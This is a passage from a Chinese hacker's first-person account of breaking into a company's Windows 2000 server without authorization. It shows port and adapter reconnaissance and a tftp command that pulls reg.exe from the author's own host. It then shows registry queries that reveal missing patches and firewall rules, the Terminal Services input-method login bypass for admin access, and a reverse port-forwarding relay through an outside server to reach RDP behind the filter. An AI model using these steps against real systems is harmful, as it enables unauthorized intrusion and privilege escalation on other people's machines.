<5>看看网络状况，这几个比较有意思：

TCP 0.0.0.0:21 0.0.0.0:0 LISTENING
TCP 0.0.0.0:119 0.0.0.0:0 LISTENING
TCP 192.168.1.3:3389 0.0.0.0:0 LISTENING

　　看来有TermService，不过在网卡上做了TCP/IP过滤，只对内网开放，那么我们就来

<6>看看网卡设置信息：

Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet Adapter
Physical Address. . . . . . . . . : 00-E0-4C-68-C4-B2
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.1.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet Adapter#2
Physical Address. . . . . . . . . : 00-E0-4C-68-B8-FC
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . :xxx
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :

　　经过上面的一些步骤，对这台服务器的设置情况就有了一个大概的了解。如何取得admin权限？netdde?pipeupadmin?呵呵，无法利用，没有可利用的可以登陆的用户。下套？等到什么时候，呵呵。

　　Okok!让我们来看看这个系统都打了些什么补丁。怎么查看？呵呵，打了补丁后，信息都会存贮在注册表中，查询注册表中的这个键值就行了："HKLM\Software\Microsoft\Windows NT\CurrentVersion\hotfix"，这样的话，我们得上传一个reg.exe[M$ Resource Kit中的命令行注册表编辑器]到服务器里面，我们才能操作他的注册表。开始我想用先写一个ftp脚本，然后ftp -s:cmd.txt让他到我的服务器来下载，但结果失败了，后来才想起他做了TCP/IP过滤，5555，我记性真不好。怎么办呢？有办法，用tftp来传输。我先在我的服务器上安装了一个Cisco TFTP Server，然后在目标机器上运行tftp -I www.eyas.org GET reg.exe，呵呵，传输过去咯。然后运行
REG QUERY "HKLM\Software\Microsoft\Windows NT\CurrentVersion\hotfix"

　　返回数据如下：
Listing of [Software\Microsoft\Windows NT\CurrentVersion\hotfix]

[Q147222]==>这个不知道是什么东西，好象默认2k机器上都有
[Q269862]==>Q269862_W2K_SP2_x86_CN.EXE==>Microsoft IIS Unicode解码目录遍历漏洞!
[Q277873]==>Q277873_W2K_sp2_x86_CN.EXE==>Microsoft IIS CGI文件名检查漏洞!

　　呵呵，==>和后面的说明是我加上去的，不是注册表中的。看来管理员不太勤快啊，只打了两个补丁。

　　哈哈！到了这一步，大家想到怎么取得admin权限了吗？呵呵，你一定也想到了，他的机器开了TermService服务，但windows2000登陆验证可被绕过的漏洞没有安装补丁，此补丁为Q270676_W2K_SP2_x86_CN.EXE。由此看来，管理员只是删除了帮助法文件，而没有打补丁。用dir c:\winnt\help\win*验证一下，果然没有熟悉的输入法帮助文件。敌人没有输入法，我们帮他造，hoho~~别忘了我们可以往任何地方写文件哦。

　　嘻嘻，咱们也别高兴的太早了，别忘了他的机器做了TCP/IP过滤哦，我们是没有办法连接到他的3389端口的。不要着急，不要着急，让我们先来看看他的TCP/IP过滤的设置情况。怎么看呢？老办法，查看注册表里面的键值啦。用刚才的reg.exe查询

<1>reg QUERY "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces"
Listing of [System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces]
[{4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}]
[{612A3142-DB85-4D4E-8028-81A9EB4D6A51}]

<2>reg QUERY "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
{4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}"
Listing of [System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
{4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}]
MULTI_SZ IPAddress ;
MULTI_SZ TCPAllowedPorts 25;53;80;110;3306;
MULTI_SZ UDPAllowedPorts 0;
MULTI_SZ RawIPAllowedProtocols 0;

<3>reg QUERY "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
{612A3142-DB85-4D4E-8028-81A9EB4D6A51}"
Listing of [System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
{612A3142-DB85-4D4E-8028-81A9EB4D6A51}]
MULTI_SZ IPAddress 192.168.1.3;
MULTI_SZ TCPAllowedPorts 0;
MULTI_SZ UDPAllowedPorts 0;
MULTI_SZ RawIPAllowedProtocols 0;

　　篇幅关系，我过滤了一些输出。第二次查询的是外网网卡，我们可以得知只开放了TCP 25，53，80，110，3306，UDP全部，IP协议全部。第三次查询的是内网网卡，没有任何限制。
现在我们可以把输入法帮助文件上传到他的c:\winnt\help目录下去，然后如果能连接到他的3389端口的话，我们就可以得到admin权限了。问题的关键是外网网卡做了TCP/IP限制。55555，怎么办呢？如何突破？有办法！我们可以利用socket转发和反弹端口技术，照样可以连接到敌人的TermService！

具体过程如下：

<1>在我的另一台服务器www.eyas2.org[我称他为AgentMaster]上运行一个程序，监听3389端口[等待我的TermClient去连接]，监听11111端口[等待www.target.net来连接]，当然了，第2个端口可以随便选，第1个端口选其他的话，就要相应的修改TermClient，比较麻烦

<2>在www.target.net[我称他为AgentSlave]运行另外一个程序， 先连接到www.eyas2.org:11111，再连接到192.168.1.3:3389[敌人服务器内网的IP]

<3> 我的TermClient连接到www.eyas2.org:3389，这样，数据通道就全部建立好了。接下来，两个程序就忠实的为我们转发数据了。
注意：www.eyas2.org和www.eyas.org可以为同一台服务器，但要保证www.target.net能connect上你的服务器。192.168.1.3也可以换为他内网的任何一个IP。这样，当我用TermClient连接到www.eyas2.org的时候，其实是连接到www.target.net。当熟悉的登陆界面出现在我面前，我熟练的调出输入法，取得admin权限，呵呵，心里还有那么一点点成就感！

　　关于<利用socket转发和反弹端口技术突破防火墙进入内>的详细说明和程序原代码解读请参见我另一篇文章。

　　简要的回顾一下：发现mysql漏洞==>凭直觉猜中IIS物理路径==>写一个cmd.asp文件上去得到一个shell==>利用系统配置错误取得admin权限接下来要做的事情，就是把漏洞通知他们的网管了[我可不敢直接告诉他们CEO，呵呵]，本来想在那机器上装个sniff什么的，再用来做跳板进一步尝试入侵他的内网，但后来想想还是算了，呵呵。